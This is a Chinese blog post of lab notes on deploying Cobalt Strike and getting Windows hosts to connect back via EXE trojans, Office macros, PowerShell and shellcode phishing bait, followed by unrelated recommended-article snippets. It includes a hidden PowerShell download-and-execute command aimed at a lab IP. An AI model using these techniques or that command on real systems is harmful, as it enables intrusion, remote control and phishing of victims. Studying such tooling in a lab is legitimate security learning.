CS(Ctwo)

已于 2023-12-12 21:28:51 修改
阅读量957 收藏 20
点赞数 16
文章标签: 网络安全
于 2023-12-12 21:27:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy_wjyjw/article/details/134959448
版权

CS(Ctwo)

Cobalt Strike是一个命令和控制的终端工具

默认50050端口

​ Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。

​ Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等

image-20231212100059152

实际操作

win11

  • 打开cs(右击——打开文件所在位置)

image-20231212100229271

  • 导出server
  • 放在kali中

image-20231212110317179

kali

设置执行权限

sudo chmod 777 *

image-20231212110611264

  • 执行脚本
sudo ./teamserver
  • 发现报错

image-20231212100813800

  • 启动服务器
sudo ./teamserver kali的iIP 123456

image-20231212100924838

  • 启动成功

成功启动后,发现有一串SSL证书的哈希

image-20231212111303732

win11中双击cs,弹出一个框

  • 添加相关信息
  • 点击连接

image-20231212111707789

  • 对比哈希值以及证书,发现一样,说明正确

  • 正常交换公钥

image-20231212101231892

成功进入cs控制台

image-20231212112448216

工具栏解释

image-20231212142905829

1.新建连接
2.断开当前连接
3.监听器
4.改变视图为Pivot Graph(视图列表)
5.改变视图为Session Table(会话列表)
6.改变视图为Target Table(目标列表)
7.显示所有以获取的受害主机的凭证
8.查看已下载文件
9.查看键盘记录结果
10.查看屏幕截图
11.生成无状态的可执行exe木马
12.使用java自签名的程序进行钓鱼攻击
13.生成office宏病毒文件
14.为payload提供web服务以便下载和执行
15.提供文件下载,可以选择Mime类型
16.管理Cobalt Strike上运行的web服务
17.帮助
18.关于

上线木马

手法

EXE病毒
  • 查看kali开放的端口
sudo ss -antpl

image-20231212113010140

  • 在cs工具中添加listeners

image-20231212113907764

  • 在服务器上开启了一个6666端口
  • 6666端口是用来接收木马反连过来的控制权限

image-20231212114015170

  • 查看kali开放的端口
sudo ss -antpl
  • 6666端口开放成功

image-20231212114454158

  • 生成木马

image-20231212114612681

image-20231212114707043

image-20231212114804748

成功生成木马

使用木马
  • 双击木马

image-20231212115005803

  • 生成木马成功

  • 成功控制桌面

image-20231212115427462

宏病毒
  • 在主机上新建一个文档,打开(试图——宏),并创建test用户

image-20231212162727330

image-20231212162758543

  • 在win11中创建宏

image-20231212163806167

image-20231212163922166

  • 复制教程

image-20231212164151033

  • 将教程回到主机上word的宏——点击保存

image-20231212164515536

  • 查看宏有内容

image-20231212164831018

  • 发现主机上线了

image-20231212165147307

  • 测试访问主机的桌面

  • 成功访问到主机的桌面

image-20231212165434200

关闭上线操作

  • 点击主机最下面的任务管理器

  • 找到rundll,33990的端口,结束进程

  • 在win11中找到上线的ip,选择Session——remove移除

PowerShell(脚本病毒)

后缀名为ps1

  • 生成PowerShell
  • 提供了一个进攻网页

image-20231212173755203

image-20231212175037585

  • 复制命令

image-20231212175358997

  • 在命令终端打开,并执行
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.63.129:1111/a'))"

image-20231212175540458

  • win11成功上线
ShellCode

目前最火,最为使用的一种上线方式

安装插件

image-20231212192754145

image-20231212193113484

安装完成

image-20231212193318397

生成木马

image-20231212190409910

image-20231212190529790

  • 保存在桌面

image-20231212190631276

生成好的shellcode需要借助加载器才能变成可执行脚本

制作鱼饵

image-20231212202704970

image-20231212202851407

image-20231212203751764

image-20231212204010104

image-20231212204041477

image-20231212204155798

鱼饵制作成功

image-20231212204532555

image-20231212204710290

双击鱼饵

image-20231212205444379

  • 双击鱼饵前

image-20231212205214611

  • 双击鱼饵后

image-20231212205306614

上线成功

西柠!
关注
Cobalt Strike环境搭建
qq_43341224的博客
11-20 3455
环境搭建 搭建团队服务器用客户端连接。 服务器端 这里将kali虚拟机作为服务器地址。 首先需要知道服务器的IP地址ifconfig eth0或者ip add,找到自己的IP地址,这里查看到的是192.168.189.146。 进入Cobalt Strike所在目录,开启服务端,命令如下,并且设置密码为123456。 sudo ./teamserver 192.168.189.146 123456 格式为sudo ./teamserver kali的IP地址 密码 出现如下图就已经配置好服务器端了。
cs服务器搭建(cobaltstrike)
热门推荐
kang_12358的博客
06-18 1万+
0.简介 CobatStrike是一款基于java编写的全平台多方协同后渗透攻击框架。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节。 1.相关工具 java环境 CobatStrike4 (7)补充让CS程序后台运行 使用screen Connection timed out connect sudo: ./teamserver: command not found
渗透工具RedTeam-cobaltstrike搭建教程踩坑
giaogiao123的博客
08-02 677
工具下载地址 https://github.com/makoto56/cobaltstrike-4.2-cn 为什么说是踩坑,首先下载完成之后 我把kali当成服务机,win10系统当成攻击机,进行环境搭建。 kali服务机(ifconfig)-192.168.0.180 ** 第一个坑 **,授权问题 先进入目录执行命令,密码随便设,笔者设为123456 sudo ./teamserver 192.168.0.180 123456 发现没有权限,执行 chmod 777 teamserver 进行授
内网安全学习从入门到入狱-神器-Cobalt Strike-一-CS的基础和介绍
god_Zeo的安全博客
03-06 2450
内网安全学习从入门到入狱-工具-CS基础.md 前言 本文主要是看了 Cobalt Strike 各种资料后记的笔记。 参考过于杂乱,如有问题请联系我 手上虽然没有4.0 ,但是也要提前学习了 Cobalt Strike简介 官网收费软件 https://www.cobaltstrike.com/,Cobalt Strike许可费用为每位用户3500美元,其他的不说了 Coba...
CobaltStrike使用详解
rang的博客
09-28 2225
CobaltStrike CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能! CobaltStrike的
CS61C总结
doyouthinks的博客
06-01 982
CS 61C 课程名称是,毫无疑问核心内容就是这些 ideas,6 个 ideas 内容分别如下。
CS61C 学习笔记 --实时更新
pursue_my_life的博客
09-23 8212
CS61c Note 第一周 计算机中数值的表示及其转换 Lecture Topic 分为两部分: 计算机历史即计算机组成介绍、 数值转换及其表示 Reading Section 四种表示法: Sign and … one’s complete basic two’s complete Lab 五个游戏,举例其中最有意思的两个: 给你1000个1的纸币,和10个信封,并把钱放到信封里...
斯坦福CS课程列表
摆渡者
12-25 1万+
http://exploredegrees.stanford.edu/coursedescriptions/cs/ CS 101. Introduction to Computing Principles. 3-5 Units. Introduces the essential ideas of computing: data representation, algorithms, prog...
CS231n】Two Layer Neural Network 代码实现
天才小熊猫的博客
02-14 737
1. 代码实现 主要包括连个.py文件,一个是two_layer_net.py,另外一个是neural_net.py 1.1 two_layer_net.py 1.1.1 初始化 # two layer net # A bit of setup from __future__ import print_function import numpy as np import matplo...
cs231n Assignment 1# two layer net详细答案及总结
i_csdn_water的博客
03-14 3402
Forward pass: 这里没有任何技术上的难点,就是写了文件中loss函数中scores和loss部分。 loss函数作用就是如果传入了y就返回loss和对所有w和b的梯度,这里在traning的时候调取。 如果没有传入y,就只返回scores,在predict的时候调用。 backward pass: 这里写了loss函数中计算grads的部分,完成了loss函数的书写内容。 ...
cs231n作业:Assignment1- two_layer_net
MR CODER
12-16 404
from __future__ import print_function from builtins import range from builtins import object import numpy as np import matplotlib.pyplot as plt from past.builtins import xrange class TwoLayerNet(obj...
深度学习系列之cs231n assignment1 two_layer_net(五)
明曦君的小家
03-22 1145
写在开头:这次是完成assignmengt1的第四个作业浅层神经网络,通过这样的浅层神经网络来感受神经网络向前计算得分与向后计算梯度更新的过程。 内容安排 今天的任务主要是搭建两层全连接层,并在中间加入Relu的操作处理,最后使用softmax的损失函数进行梯度的更新,并进行预测。在本次的任务中与上一节softmax的区别在于搭建网络和全连接层的传递,任务的loss是softmax是一样的,同...
斯坦福cs231n课程记录——assignment1 Two-layer neural network
weixin_39880579的博客
01-23 1345
1
渗透测试器cobalt strike的使用
weixin_50683638的博客
04-13 366
渗透测试器cobalt strike的使用 一、Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 操作需求(kali虚拟机) 二、链接:https://pan.baidu.com/s/1atCLurHyBLPBscYZwJQZwg 提取码:wyqx 在kali中解压unzip Cobaltstrike4.2.zip 查看并且给文件
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8530
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
脑机接口电路与系统 Amir
最新发布
11-02
脑机接口电路与系统 Amir
WaCRM:提升电商独立站用户的WhatsApp营销利器安装文件v3.1.0.zip
11-02
在当今数字化时代,企业与客户之间的沟通方式正在不断演变。WhatsApp作为全球最受欢迎的即时通讯应用之一,已成为企业与客户互动的重要渠道。为了帮助电商独立站用户更有效地利用这一平台,WaCRM应运而生。这款专为Windows平台设计的多账户WhatsApp CRM软件,提供了一系列强大的功能,旨在提升企业的营销和销售效率。 WaCRM的核心功能 多账户管理: WaCRM允许用户同时管理多个WhatsApp账户,这对于拥有多个电商品牌或产品线的独立站用户尤为重要。用户可以在一个界面内轻松切换不同账户,进行消息发送和客户管理,极大地提高了工作效率。 自动化功能: 通过设置自动回复和消息调度,用户可以确保在任何时候都不会错过潜在客户的询问。自动化的提醒功能也能帮助用户及时跟进客户,提升转化率。 群组管理: 在电商营销中,群组营销是一种有效的策略。WaCRM提供了强大的群组管理工具,用户可以轻松加入、管理和清理群组,确保信息传递的有效性和及时性。 数据提取与分析: WaCRM具备数据提取功能,用户可以从群组、联系人列表和聊天记录中提取有价值的信息。这些数据可以帮助电商独立站用户更好地
[文件]作业帮试卷上传.pdf
11-02
[文件]作业帮试卷上传.pdf
httpd-tools-2.4.6-99.el7.centos.1.x86_64.rpm
11-02
Centos7 el7.x86_64 官方离线安装包,安装指令为 sudo rpm -ivh httpd-tools-2.4.6-99.el7.centos.1.x86_64.rpm
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值